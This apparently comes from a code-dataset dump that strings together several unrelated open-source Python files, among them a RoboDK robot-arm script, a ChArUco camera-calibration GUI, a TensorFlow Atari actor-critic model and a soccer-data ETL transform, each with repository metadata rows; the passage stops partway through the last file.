p = srd.Person(age=66, earn=work_inc, othtax=20e3)
hh = srd.Hhold(p, prov='qc')
qc_form = quebec.form(2019)
qc_form.file(hh)
assert isclose(qc_form.get_exp_worker_cred(p), amount, abs_tol=1)
| 36.066667
| 123
| 0.637708
| 0
| 0
| 0
| 0
| 1,192
| 0.734442
| 0
| 0
| 365
| 0.224892
|
afa13b4e4fc345a627c690ebb66190bf2e512666
| 1,382
|
py
|
Python
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | 1
|
2019-05-23T14:26:21.000Z
|
2019-05-23T14:26:21.000Z
|
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
Prog1.py
|
tudoriliuta/UR3RL
|
9a98d530318f5931ddc195d8ffa7ebc406cd6419
|
[
"MIT"
] | null | null | null |
# Type help("robolink") or help("robodk") for more information
# Press F5 to run the script
# Documentation: https://robodk.com/doc/en/RoboDK-API.html
# Reference: https://robodk.com/doc/en/PythonAPI/index.html
# Note: It is not required to keep a copy of this file, your python script is saved with the station
from robolink import * # RoboDK's API
from robodk import * # Math toolbox for robots
# Start the RoboDK API:
RDK = Robolink()
# Get the robot item by name:
robot = RDK.Item('UR3', ITEM_TYPE_ROBOT)
# Get the reference target by name:
R = 100
for i in range(2):
target = RDK.Item('Target %s' % (i+1))
target_pose = target.Pose()
xyz_ref = target_pose.Pos()
# Move the robot to the reference point:
robot.MoveJ(target)
# Draw a hexagon around the reference target:
for i in range(7):
ang = i * 2 * pi / 6 # ang = 0, 60, 120, ..., 360
# Calculate the new position around the reference:
x = xyz_ref[0] + R * cos(ang) # new X coordinate
y = xyz_ref[1] + R * sin(ang) # new Y coordinate
z = xyz_ref[2] # new Z coordinate
target_pose.setPos([x,y,z])
# Move to the new target:
robot.MoveL(target_pose)
# Trigger a program call at the end of the movement
# robot.RunCode('Program_Done')
# Move back to the reference target:
robot.MoveL(target)
| 32.139535
| 100
| 0.644718
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 813
| 0.588278
|
afa16d72320b51ad48b9e7a6f4900aaa906c676a
| 101
|
py
|
Python
|
main.py
|
JesperKauppinen/dont-touch-the-spikes-clone
|
c5b0961fe8bbc0706191649bbae2d1784dd72e1d
|
[
"MIT"
] | null | null | null |
main.py
|
JesperKauppinen/dont-touch-the-spikes-clone
|
c5b0961fe8bbc0706191649bbae2d1784dd72e1d
|
[
"MIT"
] | null | null | null |
main.py
|
JesperKauppinen/dont-touch-the-spikes-clone
|
c5b0961fe8bbc0706191649bbae2d1784dd72e1d
|
[
"MIT"
] | null | null | null |
from game import Game
g = Game()
while g.running:
g.curr_menu.display_menu()
g.game_loop()
| 12.625
| 30
| 0.673267
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
afa2159b2cf1eb45a5549805ce6ddf7bf5854552
| 203
|
py
|
Python
|
pych_client/exceptions.py
|
dioptra-io/pych
|
46ff9cedb8fac6b35c8eaab442834d9ce190e43d
|
[
"MIT"
] | null | null | null |
pych_client/exceptions.py
|
dioptra-io/pych
|
46ff9cedb8fac6b35c8eaab442834d9ce190e43d
|
[
"MIT"
] | null | null | null |
pych_client/exceptions.py
|
dioptra-io/pych
|
46ff9cedb8fac6b35c8eaab442834d9ce190e43d
|
[
"MIT"
] | null | null | null |
class ClickHouseException(Exception):
def __init__(self, query: str, err: str):
err = "\n".join(err.split(". "))
msg = f"Query\n{query}\n\nError\n{err}"
super().__init__(msg)
| 33.833333
| 47
| 0.591133
| 202
| 0.995074
| 0
| 0
| 0
| 0
| 0
| 0
| 41
| 0.20197
|
afa29bf04f32cf1f5c5165ddb76b18a6eec1cbfc
| 1,474
|
py
|
Python
|
ccdc/pixel.py
|
USGS-EROS/lcmap-gen
|
1be50eb316f7d737d6bbd000bd6a8b5006730928
|
[
"Unlicense"
] | 6
|
2018-07-09T00:33:52.000Z
|
2019-11-14T16:36:39.000Z
|
ccdc/pixel.py
|
USGS-EROS/lcmap-gen
|
1be50eb316f7d737d6bbd000bd6a8b5006730928
|
[
"Unlicense"
] | 1
|
2017-04-26T17:22:34.000Z
|
2017-04-26T17:38:59.000Z
|
ccdc/pixel.py
|
USGS-EROS/lcmap-gen
|
1be50eb316f7d737d6bbd000bd6a8b5006730928
|
[
"Unlicense"
] | 2
|
2018-06-11T17:59:03.000Z
|
2018-07-09T00:33:54.000Z
|
from ccdc import cassandra
from pyspark.sql.types import ArrayType
from pyspark.sql.types import ByteType
from pyspark.sql.types import IntegerType
from pyspark.sql.types import StructField
from pyspark.sql.types import StructType
def table():
"""Cassandra table name"""
return 'pixel'
def schema():
"""Schema for pixel dataframe"""
return StructType([
StructField('cx' , IntegerType(), nullable=False),
StructField('cy' , IntegerType(), nullable=False),
StructField('px' , IntegerType(), nullable=False),
StructField('py' , IntegerType(), nullable=False),
StructField('mask' , ArrayType(ByteType()), nullable=True)])\
def dataframe(ctx, ccd):
"""Create pixel dataframe from ccd dataframe
Args:
ctx: spark context
ccd: CCD dataframe
Returns:
dataframe conforming to pixel.py
"""
return ccd.select(schema().fieldNames())
def read(ctx, ids):
"""Read pixels
ctx: spark context
ids: dataframe of (cx, cy)
Returns:
dataframe conforming to pixel.schema()
"""
return ids.join(cassandra.read(ctx, table()),
on=['cx', 'cy'],
how='inner')
def write(ctx, df):
"""Write pixels
Args:
ctx: spark context
df : dataframe conforming to pixel.schema()
Returns:
df
"""
cassandra.write(ctx, df, table())
return df
| 22.333333
| 70
| 0.603121
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 562
| 0.381275
|
afa4b7d2595f4e0c541626173ba9e42640a0a707
| 6,471
|
py
|
Python
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 4
|
2020-11-11T07:07:55.000Z
|
2022-02-22T02:39:01.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 2
|
2021-03-17T17:46:56.000Z
|
2021-03-18T08:19:04.000Z
|
ekmap_core/qgslabel_parser/label_parser.py
|
eKMap/ekmap-publisher-for-qgis
|
cb9dac6c29be3617c2155c1e38d9d1dffbdbad96
|
[
"MIT"
] | 1
|
2021-10-31T21:00:55.000Z
|
2021-10-31T21:00:55.000Z
|
from PyQt5.QtWidgets import QMainWindow
from ..ekmap_converter import eKConverter
import re
from qgis.core import QgsMessageLog
class LabelParser:
def __init__(self, labeling):
self.labeling = labeling
def _readTextStyle(self, settings):
labelFormat = settings.format()
field = settings.fieldName
finds = re.findall(r"\((.*?)\)", field)
if (len(finds) == 1):
field = finds[0]
xOffset = float(settings.xOffset)
yOffset = float(settings.yOffset)
offsetUnit = settings.offsetUnits
xOffset = eKConverter.convertUnitToPixel(value=xOffset, unit=offsetUnit)
yOffset = eKConverter.convertUnitToPixel(value=yOffset, unit=offsetUnit)
if xOffset == 0 and yOffset == 0:
yOffset = -1.5
fontName = labelFormat.font().family()
fontColor = labelFormat.color().name()
# fontStyle = labelFormat.namedStyle()
fontSize = float(labelFormat.size())
fontSizeUnit = labelFormat.sizeUnit()
# convert the size to pixel
fontSize = eKConverter.convertUnitToPixel(value = fontSize, unit = fontSizeUnit)
# Refer: https://qgis.org/api/classQgsTextBufferSettings.html
strokeColor = labelFormat.buffer().color().name()
strokeWidth = labelFormat.buffer().size()
strokeWidthUnit = labelFormat.buffer().sizeUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# TEMP
placement = settings.placement
placement = eKConverter.convertLabelPlacement(placement)
# Export information here
labelPaint = {
'text-color': fontColor,
'text-halo-color': strokeColor,
'text-halo-width': strokeWidth,
}
labelLayout = {
'text-font': [fontName],
'text-field': ["get", field],
'text-size': fontSize,
'text-offset': [xOffset, yOffset],
'text-anchor': self.__getAnchor(settings),
'text-rotate': self.__getRotation(settings),
'symbol-placement': placement,
}
return {
'type': 'symbol',
'paint': labelPaint,
'layout': labelLayout
}
def readZoomLevel(self, settings):
minLevel = 0
maxLevel = 22
if settings.scaleVisibility:
minLevel = eKConverter.convertScaleToLevel(scale = settings.minimumScale)
if settings.maximumScale != 0:
maxLevel = eKConverter.convertScaleToLevel(scale = settings.maximumScale)
# Export information here
return {
'minLevel': minLevel,
'maxLevel': maxLevel,
'visible': True
}
# Refer: https://qgis.org/pyqgis/3.0/core/Text/QgsTextBackgroundSettings.html
def readBackground(self, settings):
background = settings().format().background()
if background.enabled():
# Identify the type of background
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a91794614626586cc1f3d861179cc26f9
# basic shape like: rectangle = 0,
# square = 1, eclipse = 2, circle = 3
# or svg image = 4
# or marker symbol = 5
backgroundType = background.type()
# Identify the type of size
# Refer: https://qgis.org/api/classQgsTextBackgroundSettings.html#a45798d989b02e1dfcad9a6f1db4cd153
# 1 = buffer: the size of background = size of label + buffer
# 2 = fixed: the size of background = fixed
# 3 = percent: determine by the size of text size
# sizeType = background.sizeType()
# Get the size information
# this return QSizeF object
size = background.size()
width = size.width()
height = size.height()
# Identify the unit of size
sizeUnit = background.sizeUnit()
# then convert the size to pixel
width = eKConverter.convertUnitToPixel(value = width, unit = sizeUnit)
height = eKConverter.convertUnitToPixel(value = height, unit = sizeUnit)
# Get the fill and stroke
# apply for basic shape only
if backgroundType < 4:
# fillColor = background.fillColor().name()
# strokeColor = background.strokeColor().name()
strokeWidth = background.strokeWidth()
strokeWidthUnit = background.strokeWidthUnit()
# convert the width to pixel
strokeWidth = eKConverter.convertUnitToPixel(value = strokeWidth, unit = strokeWidthUnit)
# Export information here
# ...
def readPlacement(self, settings):
layerType = settings.layerType()
# Refer: https://qgis.org/api/classQgsWkbTypes.html#a60e72c2f73cb07fdbcdbc2d5068b5d9c
# POINT
if layerType == 0:
# Point has: Cartographic (6),
# around point (0),
# offset from point (1)
a = 1
# LINESTRING
elif layerType == 1:
# Line has: Parallel, curved, horizontal
a = 2
# POLYGON
elif layerType == 2:
# Polygon has: Offset from point, horizontal,
# around centroid, free, using perimeter,
# using perimeter (curved), outside polygons
a = 3
def __getAnchor(self, settings):
placement = settings.placement
# Only offset from point has Anchor
if placement == 1:
quadOffset = settings.quadOffset
return eKConverter.convertQuadrantToAnchor(quadOffset)
# Other set default
else:
return 'bottom'
def __getRotation(self, settings):
# In-case user defined rotation:
definedProperties = settings.dataDefinedProperties()
LABEL_ROTATION = 96
rotationProperty = definedProperties.property(LABEL_ROTATION)
if rotationProperty.isActive():
fieldBase = rotationProperty.field()
return ['get', fieldBase]
else:
placement = settings.placement
# Only offset from point has Rotation
if placement == 1:
return settings.angleOffset
else:
return 0
| 36.767045
| 111
| 0.591871
| 6,339
| 0.979601
| 0
| 0
| 0
| 0
| 0
| 0
| 1,863
| 0.2879
|
afa690096a6121167933e215558dabc81606d2f3
| 8,069
|
py
|
Python
|
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
main.py
|
lyffly/CameraCalibration
|
aacdcc9ea711154060f078f0564f8143077cac88
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# coding by liuyunfei
# 2020-4-12
import sys
from PyQt5.QtWidgets import QApplication, QMainWindow, QMessageBox
from PyQt5.QtCore import QThread, pyqtSignal, QDateTime, QObject, QMutexLocker, QMutex, QTimer
from PyQt5.QtGui import QPixmap
from PyQt5 import Qt, QtCore
from PyQt5.QtCore import QByteArray
from PyQt5.QtGui import QPixmap, QImage
import os
import cv2
import time
import glob
import numpy as np
from copy import deepcopy
from ui.ui import *
image_mutex = QMutex()
image = None
org_img = None
camera_mutex = QMutex()
num_i = 0
def cv2img_to_Qpixmap(frame):
if len(frame.shape) == 2:
cvRGBImg = cv2.cvtColor(frame,cv2.COLOR_GRAY2RGB)
elif len(frame.shape) == 3:
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
h,w,c = cvRGBImg.shape
cvRGBImg = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
qimg = QImage(cvRGBImg.data, w, h, c*w, QImage.Format_RGB888)
pixmap01 = QPixmap.fromImage(qimg)
pix = QPixmap(pixmap01)
return pix
class UpdateImg(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(UpdateImg, self).__init__()
self.image = None
def run(self):
fnames = glob.glob("imgs/*.png")
allCorners = []
allIds = []
for name in fnames:
im = cv2.imread(name,1)
dictionary = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
board = cv2.aruco.CharucoBoard_create(7, 9, .015, .0111, dictionary) #0.025单位是米
corners, ids, rejected = cv2.aruco.detectMarkers(im, dictionary)
print(len(corners))
if corners == None or len(corners) == 0:
continue
ret, charucoCorners, charucoIds = cv2.aruco.interpolateCornersCharuco(corners, ids, im, board) #其中的参数依赖于detectMarkers检测的初始值
if corners is not None and charucoIds is not None:
if len(corners) == 31:
allCorners.append(charucoCorners)
allIds.append(charucoIds)
cv2.aruco.drawDetectedMarkers(im,corners,ids)
self.update_pix1.emit([im])
time.sleep(0.1)
w,h=im.shape[1],im.shape[0]
ret, K, dist_coef, rvecs, tvecs = cv2.aruco.calibrateCameraCharuco(allCorners, allIds, board,(w,h),None,None)
dist_coef = dist_coef[0]
txt = "Matrix =\n {0}\nDist_coef =\n {1}\n{2}\n{3}\n{4}\n{5}\n\n- {6}".format(K,dist_coef[0],dist_coef[1],\
dist_coef[2],dist_coef[3],dist_coef[4],"By:Liu Yunfei")
self.update_pix1.emit([None,txt])
class ColorImageThread(QObject):
update_pix1 = pyqtSignal(list)
def __init__(self):
super(ColorImageThread, self).__init__()
def run(self):
global image
global image_mutex
while True:
image_mutex.lock()
img = deepcopy(image)
image_mutex.unlock()
if img is not None:
self.update_pix1.emit([img])
time.sleep(0.02)
class MyWindow(QMainWindow,Ui_Dialog):
def __init__(self, parent=None):
super(MyWindow, self).__init__(parent)
self.setupUi(self)
self.open_camera_button.clicked.connect(self.OnOpenCameraBtn)
self.capture_button.clicked.connect(self.OnCaptureBtn)
self.close_camera_button.clicked.connect(self.OnCloseCameraBtn)
self.cali_button.clicked.connect(self.OnCaliBtn)
self.set_button.clicked.connect(self.getSetInfo)
self.image_label.setScaledContents(False)
self.setWindowTitle("Camera Calibration using ChAruco by LiuYunfei")
self.timer = QTimer()
self.timer.timeout.connect(self.timerEvent)
self.camera_image = None
self.camera_no = 0
self.camera_width = 0
self.camera_height = 0
self.aruco_width = 0
self.aruco_height = 0
self.save_folder = ""
self.cap = None
self.sleep = False
self.getSetInfo()
def getSetInfo(self):
camera_no = self.lineEdit1.text()
camera_width = self.lineEdit2.text()
camera_height = self.lineEdit3.text()
aruco_width = self.lineEdit4.text()
aruco_height = self.lineEdit5.text()
self.camera_no = int(camera_no)
self.camera_width = int(camera_width)
self.camera_height = int(camera_height)
self.aruco_width = int(aruco_width)
self.aruco_height = int(aruco_height)
def timerEvent(self):
global image
global org_img
global image_mutex
if self.sleep ==False:
time.sleep(2)
self.sleep = True
camera_mutex.lock()
ret,frame = self.cap.read()
camera_mutex.unlock()
if ret:
image_mutex.lock()
org_img = deepcopy(frame)
image_mutex.unlock()
dd = cv2.aruco.getPredefinedDictionary(cv2.aruco.DICT_4X4_50)
board = cv2.aruco.CharucoBoard_create(self.aruco_width, self.aruco_height, .015, .0111, dd)#0.025单位是米
corners, ids, rejected = cv2.aruco.detectMarkers(frame,dd)
if corners == None or len(corners) == 0:
pass
else:
cv2.aruco.drawDetectedMarkers(frame,corners,ids)
image_mutex.lock()
image = deepcopy(frame)
image_mutex.unlock()
def updateColorImage(self,list_tmp):
img = list_tmp[0]
if img is not None:
qimg = cv2img_to_Qpixmap(img)
pix2 = qimg.scaled(800, 600, QtCore.Qt.KeepAspectRatio, QtCore.Qt.SmoothTransformation)
self.image_label.setPixmap(pix2)
if len(list_tmp) > 1:
text = list_tmp[1]
self.label_result.setText(text)
def OnOpenCameraBtn(self):
self.cap = cv2.VideoCapture(self.camera_no)
fps = self.cap.get(cv2.CAP_PROP_FPS)
print("FPS = {} fps".format(fps))
self.cap.set(cv2.CAP_PROP_FRAME_WIDTH,self.camera_width)
self.cap.set(cv2.CAP_PROP_FRAME_HEIGHT,self.camera_height)
time.sleep(0.5)
self.timer.start(30)
self.updataImg = ColorImageThread()
self.updataImg.update_pix1.connect(self.updateColorImage)
self.uithread1 = QThread()
self.updataImg.moveToThread(self.uithread1)
self.uithread1.started.connect(self.updataImg.run)
self.uithread1.start()
def OnCaliBtn(self):
global image
global image_mutex
self.updateimg = UpdateImg()
self.updateimg.update_pix1.connect(self.updateColorImage)
self.ui2 = QThread()
self.updateimg.moveToThread(self.ui2)
self.ui2.started.connect(self.updateimg.run)
self.ui2.start()
def UpdateTimeUI(self,data):
self.label_result.setText(data)
def OnCaptureBtn(self):
global image
global image_mutex
global org_img
global num_i
image_mutex.lock()
img = deepcopy(org_img)
image_mutex.unlock()
name = "imgs/{}.png".format(num_i)
cv2.imwrite(name,img)
print("({}),img saved. {}".format(num_i,name))
num_i +=1
def OnCloseCameraBtn(self):
self.timer.stop()
self.updataImg.disconnect()
#self.updataImg.update_pix1.disconnect()
self.uithread1.terminate()
camera_mutex.lock()
self.cap.release()
camera_mutex.unlock()
if __name__ == '__main__':
app = QApplication(sys.argv)
myWin = MyWindow()
myWin.show()
sys.exit(app.exec_())
| 34.33617
| 137
| 0.587433
| 6,878
| 0.847775
| 0
| 0
| 0
| 0
| 0
| 0
| 396
| 0.048811
|
afaa3f5a9633f887b543c143ac5957ba0b5db6a8
| 145
|
py
|
Python
|
pythontraining/unittesting.py
|
srikanteswartalluri/pyutils
|
bf8d56ac9e9b0786861c08ef32eae49b021f20a3
|
[
"0BSD"
] | null | null | null |
pythontraining/unittesting.py
|
srikanteswartalluri/pyutils
|
bf8d56ac9e9b0786861c08ef32eae49b021f20a3
|
[
"0BSD"
] | null | null | null |
pythontraining/unittesting.py
|
srikanteswartalluri/pyutils
|
bf8d56ac9e9b0786861c08ef32eae49b021f20a3
|
[
"0BSD"
] | null | null | null |
__author__ = 'talluri'
def sum(*args):
if len(args) == 0:
return None
s = 0
for arg in args:
s += arg
return s
| 13.181818
| 22
| 0.496552
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 9
| 0.062069
|
afaaa12bee233defec8a78a507b98355a9769f87
| 11,423
|
py
|
Python
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 10
|
2018-07-31T21:04:02.000Z
|
2022-02-03T18:58:45.000Z
|
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | null | null | null |
actorcritic/envs/atari/model.py
|
jrobine/actor-critic
|
2f72d296c0b550982b0400b6afb7a7a0dfe3f144
|
[
"MIT"
] | 1
|
2018-08-01T18:09:35.000Z
|
2018-08-01T18:09:35.000Z
|
"""An implementation of an actor-critic model that is aimed at Atari games."""
import gym
import numpy as np
import tensorflow as tf
import actorcritic.nn as nn
from actorcritic.baselines import StateValueFunction
from actorcritic.model import ActorCriticModel
from actorcritic.policies import SoftmaxPolicy
class AtariModel(ActorCriticModel):
"""An :obj:`~actorcritic.model.ActorCriticModel` that follows the A3C and ACKTR paper.
The observations are sent to three convolutional layers followed by a fully connected layer, each using rectifier
activation functions (ReLU). The policy and the baseline use fully connected layers built on top of the last hidden
fully connected layer separately. The policy layer has one unit for each action and its outputs are used as logits
for a categorical distribution (softmax). The baseline layer has only one unit which represents its value.
The weights of the layers are orthogonally initialized.
Detailed network architecture:
- Conv2D: 32 filters 8x8, stride 4
- ReLU
- Conv2D: 64 filters 4x4, stride 2
- ReLU
- Conv2D: 64 filters 3x3, stride 1 (number of filters based on argument `conv3_num_filters`)
- Flatten
- Fully connected: 512 units
- ReLU
- Fully connected (policy): units = number of actions / Fully connected (baseline): 1 unit
A2C uses 64 filters in the third convolutional layer. ACKTR uses 32.
The policy is a :obj:`~actorcritic.policies.SoftmaxPolicy`.
The baseline is a :obj:`~actorcritic.baselines.StateValueFunction`.
See Also:
This network architecture was originally used in: https://www.nature.com/articles/nature14236
"""
def __init__(self, observation_space, action_space, conv3_num_filters=64, random_seed=None, name=None):
"""
Args:
observation_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`observations_placeholder` and the
:attr:`bootstrap_observations_placeholder`.
action_space (:obj:`gym.spaces.Space`):
A space that determines the shape of the :attr:`actions_placeholder`.
conv3_num_filters (:obj:`int`, optional):
Number of filters used for the third convolutional layer, defaults to 64. ACKTR uses 32.
random_seed (:obj:`int`, optional):
A random seed used for sampling from the `~actorcritic.policies.SoftmaxPolicy`.
name (:obj:`string`, optional):
A name for this model.
"""
super().__init__(observation_space, action_space)
assert isinstance(action_space, gym.spaces.Discrete)
assert isinstance(observation_space, gym.spaces.Box)
self._num_actions = action_space.n
self._conv3_num_filters = conv3_num_filters
self._name = name
# TODO
# used to convert the outputs of the policy and the baseline back to the batch-major format of the inputs
# because the values are flattened in between
with tf.name_scope('shapes'):
observations_shape = tf.shape(self.observations_placeholder)
with tf.name_scope('input_shape'):
input_shape = observations_shape[:2]
with tf.name_scope('batch_size'):
batch_size = input_shape[0]
with tf.name_scope('num_steps'):
num_steps = input_shape[1]
with tf.name_scope('bootstrap_input_shape'):
bootstrap_input_shape = tf.shape(self.bootstrap_observations_placeholder)[:1]
num_stack = observation_space.shape[-1]
# the observations are passed in uint8 to save memory and then converted to scalars in range [0,1] on the gpu
# by dividing by 255
with tf.name_scope('normalized_observations'):
normalized_observations = tf.cast(self.observations_placeholder, dtype=tf.float32) / 255.0
normalized_bootstrap_observations = tf.cast(self.bootstrap_observations_placeholder,
dtype=tf.float32) / 255.0
# convert from batch-major format [environment, step] to one flat vector [environment * step] by stacking the
# steps of each environment
# this is necessary since the neural network operations only support batch inputs
with tf.name_scope('flat_observations'):
self._flat_observations = tf.stop_gradient(
tf.reshape(normalized_observations, (-1,) + observation_space.shape))
flat_bootstrap_observations = tf.stop_gradient(
tf.reshape(normalized_bootstrap_observations, (-1,) + observation_space.shape))
with tf.variable_scope(self._name, 'AtariModel'):
self._params = dict()
# create parameters for all layers
self._build_params(num_input_channels=num_stack)
# create layers for the policy and the baseline that use the standard observations as input
self._preactivations, self._activations = self._build_layers(self._flat_observations, build_policy=True)
# create layers for the bootstrap values that use the next observations as input
_, bootstrap_activations = self._build_layers(flat_bootstrap_observations, build_policy=False)
with tf.name_scope('policy'):
policy_logits = tf.reshape(self._activations['fc_policy'], [batch_size, num_steps, self._num_actions])
self._policy = SoftmaxPolicy(policy_logits, self.actions_placeholder, random_seed)
with tf.name_scope('baseline'):
baseline_logits = tf.reshape(self._activations['fc_baseline'], input_shape)
self._baseline = StateValueFunction(baseline_logits)
with tf.name_scope('bootstrap_values'):
self._bootstrap_values = tf.reshape(bootstrap_activations['fc_baseline'], bootstrap_input_shape)
def _build_params(self, num_input_channels):
with tf.name_scope('initializers'):
# values of the initializers taken from original a2c implementation
weights_initializer = tf.orthogonal_initializer(np.sqrt(2.), dtype=tf.float32)
bias_initializer = tf.zeros_initializer(dtype=tf.float32)
policy_weights_initializer = tf.orthogonal_initializer(0.01, dtype=tf.float32)
baseline_weights_initializer = tf.orthogonal_initializer(1., dtype=tf.float32)
with tf.variable_scope('conv1'):
conv1_num_filters = 32
conv1_filter_extent = 8
self._params['conv1'] = nn.conv2d_params(
num_input_channels, conv1_num_filters, conv1_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv2'):
conv2_num_filters = 64
conv2_filter_extent = 4
self._params['conv2'] = nn.conv2d_params(
conv1_num_filters, conv2_num_filters, conv2_filter_extent, tf.float32,
weights_initializer, bias_initializer)
with tf.variable_scope('conv3'):
conv3_filter_extent = 3
self._params['conv3'] = nn.conv2d_params(
conv2_num_filters, self._conv3_num_filters, conv3_filter_extent, tf.float32,
weights_initializer, bias_initializer)
conv3_flat_size = 49 * self._conv3_num_filters # TODO don't hardcode
with tf.variable_scope('fc4'):
fc4_output_size = 512
self._params['fc4'] = nn.fully_connected_params(
conv3_flat_size, fc4_output_size, tf.float32, weights_initializer, bias_initializer)
with tf.variable_scope('fc_policy'):
self._params['fc_policy'] = nn.fully_connected_params(
fc4_output_size, self._num_actions, tf.float32, policy_weights_initializer, bias_initializer)
with tf.variable_scope('fc_baseline'):
self._params['fc_baseline'] = nn.fully_connected_params(
fc4_output_size, 1, tf.float32, baseline_weights_initializer, bias_initializer)
# noinspection PyShadowingBuiltins
def _build_layers(self, input, build_policy):
preactivations = dict()
activations = dict()
with tf.variable_scope('conv1', reuse=True):
conv1_pre = nn.conv2d(input, self._params['conv1'], stride=4, padding='VALID')
conv1 = tf.nn.relu(conv1_pre)
preactivations['conv1'] = conv1_pre
activations['conv1'] = conv1
with tf.variable_scope('conv2', reuse=True):
conv2_pre = nn.conv2d(conv1, self._params['conv2'], stride=2, padding='VALID')
conv2 = tf.nn.relu(conv2_pre)
preactivations['conv2'] = conv2_pre
activations['conv2'] = conv2
with tf.variable_scope('conv3', reuse=True):
conv3_pre = nn.conv2d(conv2, self._params['conv3'], stride=1, padding='VALID')
conv3 = tf.nn.relu(conv3_pre)
preactivations['conv3'] = conv3_pre
with tf.name_scope('flat'):
conv3_flat = nn.flatten(conv3)
activations['conv3'] = conv3_flat
with tf.variable_scope('fc4', reuse=True):
fc4_pre = nn.fully_connected(conv3_flat, self._params['fc4'])
fc4 = tf.nn.relu(fc4_pre)
preactivations['fc4'] = fc4_pre
activations['fc4'] = fc4
if build_policy:
with tf.variable_scope('fc_policy', reuse=True):
fc_policy = nn.fully_connected(fc4, self._params['fc_policy'])
activations['fc_policy'] = fc_policy
with tf.variable_scope('fc_baseline', reuse=True):
fc_baseline = nn.fully_connected(fc4, self._params['fc_baseline'])
activations['fc_baseline'] = fc_baseline
return preactivations, activations
def register_layers(self, layer_collection):
"""Registers the layers of this model (neural net) in the specified :obj:`kfac.LayerCollection`
(required for K-FAC).
Args:
layer_collection (:obj:`kfac.LayerCollection`):
A layer collection used by the :obj:`~kfac.KfacOptimizer`.
"""
layer_collection.register_conv2d(
self._params['conv1'], strides=[1, 4, 4, 1], padding='VALID',
inputs=self._flat_observations, outputs=self._preactivations['conv1'])
layer_collection.register_conv2d(
self._params['conv2'], strides=[1, 2, 2, 1], padding='VALID',
inputs=self._activations['conv1'], outputs=self._preactivations['conv2'])
layer_collection.register_conv2d(
self._params['conv3'], strides=[1, 1, 1, 1], padding='VALID',
inputs=self._activations['conv2'], outputs=self._preactivations['conv3'])
layer_collection.register_fully_connected(
self._params['fc4'], inputs=self._activations['conv3'], outputs=self._preactivations['fc4'])
layer_collection.register_fully_connected(
self._params['fc_policy'], inputs=self._activations['fc4'], outputs=self._activations['fc_policy'])
layer_collection.register_fully_connected(
self._params['fc_baseline'], inputs=self._activations['fc4'], outputs=self._activations['fc_baseline'])
| 46.246964
| 119
| 0.660597
| 11,109
| 0.972512
| 0
| 0
| 0
| 0
| 0
| 0
| 4,007
| 0.350784
|
afaf5d11e5a28c1db05bcfd2d0127aa64f8b14b1
| 18,044
|
py
|
Python
|
marcotti/etl/base/transform.py
|
soccermetrics/marcotti
|
eda2f19bd6cbc6f9c7482e8fe31b2233b33aacfd
|
[
"MIT"
] | 30
|
2015-11-23T07:51:54.000Z
|
2020-06-29T16:11:55.000Z
|
marcotti/etl/base/transform.py
|
soccermetrics/marcotti
|
eda2f19bd6cbc6f9c7482e8fe31b2233b33aacfd
|
[
"MIT"
] | 1
|
2016-06-26T18:44:47.000Z
|
2016-06-29T03:02:40.000Z
|
marcotti/etl/base/transform.py
|
soccermetrics/marcotti
|
eda2f19bd6cbc6f9c7482e8fe31b2233b33aacfd
|
[
"MIT"
] | 8
|
2016-01-13T12:23:16.000Z
|
2021-10-11T07:39:33.000Z
|
import pandas as pd
import marcotti.models.club as mc
import marcotti.models.common.enums as enums
import marcotti.models.common.overview as mco
import marcotti.models.common.personnel as mcp
import marcotti.models.common.suppliers as mcs
from .workflows import WorkflowBase
class MarcottiTransform(WorkflowBase):
"""
Transform and validate extracted data.
"""
@staticmethod
def suppliers(data_frame):
return data_frame
@staticmethod
def years(data_frame):
return data_frame
@staticmethod
def seasons(data_frame):
return data_frame
def competitions(self, data_frame):
if 'country' in data_frame.columns:
transformed_field = 'country'
lambdafunc = lambda x: pd.Series(self.get_id(mco.Countries, name=x[transformed_field]))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['country_id']
elif 'confed' in data_frame.columns:
transformed_field = 'confed'
lambdafunc = lambda x: pd.Series(enums.ConfederationType.from_string(x[transformed_field]))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['confederation']
else:
raise KeyError("Cannot insert Competition record: No Country or Confederation data present")
return data_frame.join(id_frame).drop(transformed_field, axis=1)
def countries(self, data_frame):
lambdafunc = lambda x: pd.Series(enums.ConfederationType.from_string(x['confed']))
id_frame = data_frame.apply(lambdafunc, axis=1)
id_frame.columns = ['confederation']
joined_frame = data_frame.join(id_frame).drop('confed', axis=1)
return joined_frame
def clubs(self, data_frame):
